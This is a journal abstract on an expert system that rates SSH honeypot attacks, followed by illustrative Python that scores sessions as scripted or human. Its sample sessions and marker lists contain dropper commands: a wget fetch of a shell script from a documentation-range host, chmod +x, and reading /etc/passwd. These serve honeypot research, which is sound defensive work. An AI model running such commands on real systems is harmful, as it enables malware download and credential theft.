Expert system assessing threat level of attacks on a hybrid SSH honeynet
Computers & Security ( IF 5.6 ) Pub Date : 2020-05-01 , DOI: 10.1016/j.cose.2020.101784
Matej Zuzčák , Milan Zenka

Abstract Currently, many systems connected to the internet are exposed to hundreds of mostly automated network attacks on a daily basis. Most of these are very simple attacks originating from botnets. However, sophisticated attacks, conducted both by automated systems and directly by humans, are becoming more common. In order to develop adequate countermeasures, attacker behaviour has to be analysed effectively. Honeypots, a kind of lure for attacks, are used for that purpose. The configuration of a honeypot varies depending on the type of attack it is meant to attract. For simple, similar attacks that sequentially repeat predefined commands, medium-interaction honeypots are sufficient, while more sophisticated attacks require high-interaction honeypots. An essential part of the analysis is to differentiate between these types of attacks, so that the overall analysis is efficient in its use of hardware resources and effective in presenting the attacker with an appropriately emulated environment. This article first analyses the current situation and then presents a solution in the form of a system made up of a hybrid honeynet and an expert system. For now, it focuses only on the SSH protocol, as it is widely used for remote system access and is a popular target of attacks. The system has been tested on real data collected over a one-year period. The article also deals with making the redirection of SSH connections as transparent as possible.
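The abstract describes an expert system that decides, from a session's behaviour, whether an SSH attack is a scripted botnet replay (adequately served by a medium-interaction honeypot) or an interactive, more sophisticated one (worth redirecting to a high-interaction honeypot). The following is an added illustration of that decision logic, not the paper's own code or rule base: the rules, weights, thresholds and the two sample sessions are all assumptions constructed here to show how a small rule set can score a command transcript and produce a threat level plus a routing decision.

```python
"""Toy rule-based (expert-system style) scorer for SSH honeypot sessions.

Added example, not the paper's own implementation. Every rule, weight and
threshold below is an assumption chosen for illustration; the sample
sessions are constructed, not captured data.
"""
from dataclasses import dataclass
from difflib import SequenceMatcher
from statistics import pstdev
from typing import Callable, List, Tuple


@dataclass
class Session:
    src_ip: str
    commands: List[str]       # commands in the order the attacker sent them
    timestamps: List[float]   # seconds since login, one entry per command


# Command prefixes typical of scripted malware droppers (assumed list).
BOT_MARKERS = ("/bin/busybox", "cat /proc/cpuinfo", "uname -a", "wget http",
               "curl -O", "tftp ", "chmod +x", "chmod 777")
# Commands an operator exploring a box by hand tends to type (assumed list).
# Matched either exactly or as "<marker> <args>", so "w" does not match "wget".
HUMAN_MARKERS = ("ls", "cd", "cat /etc/passwd", "w", "who", "ps", "history",
                 "sudo", "find", "df", "id", "pwd")

# A rule returns (fired?, points to add when fired, human-readable reason).
Rule = Callable[[Session], Tuple[bool, int, str]]


def rule_dropper_sequence(s: Session) -> Tuple[bool, int, str]:
    """Most commands match dropper markers -> looks scripted (negative points)."""
    hits = sum(any(c.startswith(m) for m in BOT_MARKERS) for c in s.commands)
    fired = bool(s.commands) and hits / len(s.commands) >= 0.6
    return fired, -3, f"{hits}/{len(s.commands)} commands match dropper markers"


def rule_timing(s: Session) -> Tuple[bool, int, str]:
    """Near-constant sub-second gaps between commands indicate a script."""
    gaps = [b - a for a, b in zip(s.timestamps, s.timestamps[1:])]
    if len(gaps) < 2:
        return False, 0, "too few commands to judge timing"
    machine_like = max(gaps) < 1.0 and pstdev(gaps) < 0.2
    return machine_like, -2, f"gap max={max(gaps):.2f}s stdev={pstdev(gaps):.2f}s"


def rule_exploration(s: Session) -> Tuple[bool, int, str]:
    """Several reconnaissance commands (ls, cd, ps ...) suggest a human."""
    hits = sum(any(c == m or c.startswith(m + " ") for m in HUMAN_MARKERS)
               for c in s.commands)
    return hits >= 3, 3, f"{hits} exploratory commands"


def rule_retyped_command(s: Session) -> Tuple[bool, int, str]:
    """A command immediately re-sent with a small change looks like a typo fix."""
    for a, b in zip(s.commands, s.commands[1:]):
        if a != b and SequenceMatcher(None, a, b).ratio() >= 0.8:
            return True, 3, f"{a!r} retyped as {b!r}"
    return False, 0, "no near-duplicate consecutive commands"


RULES: List[Rule] = [rule_dropper_sequence, rule_timing,
                     rule_exploration, rule_retyped_command]


def assess(s: Session) -> Tuple[str, str, List[str]]:
    """Sum the points of every fired rule and map the total to a threat level
    and a routing decision for the hybrid honeynet (thresholds are assumed)."""
    score, reasons = 0, []
    for rule in RULES:
        fired, points, why = rule(s)
        if fired:
            score += points
            reasons.append(f"{rule.__name__}: {why}")
    if score >= 3:
        return "HIGH", "redirect to high-interaction honeypot", reasons
    if score <= -3:
        return "LOW", "keep on medium-interaction honeypot", reasons
    return "MEDIUM", "keep on medium-interaction honeypot, flag for review", reasons


# Constructed sample sessions (addresses from the RFC 5737 documentation range).
BOT_SESSION = Session(
    "198.51.100.7",
    ["uname -a", "cat /proc/cpuinfo", "wget http://198.51.100.7/x.sh",
     "chmod +x x.sh", "/bin/busybox ECHO"],
    [0.1, 0.3, 0.5, 0.7, 0.9],
)
HUMAN_SESSION = Session(
    "203.0.113.42",
    ["w", "ls -la", "cd /tmp", "cat /etc/pasd", "cat /etc/passwd", "ps aux",
     "wget http://198.51.100.7/tool.tgz"],
    [0.0, 4.2, 9.8, 13.1, 15.0, 22.7, 40.3],
)

if __name__ == "__main__":
    for sess in (BOT_SESSION, HUMAN_SESSION):
        level, decision, reasons = assess(sess)
        print(f"{sess.src_ip}: {level} -> {decision}")
        for r in reasons:
            print("   ", r)
```

The scripted session fires the dropper-marker and timing rules and is rated LOW, so it stays on the medium-interaction emulation; the interactive session fires the exploration and retyped-command rules, is rated HIGH, and would be handed to a high-interaction host. In a real deployment the rule base would be tuned on captured sessions, and the routing decision has to be taken early in the session so the redirection stays transparent to the attacker.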

Updated: 2020-05-01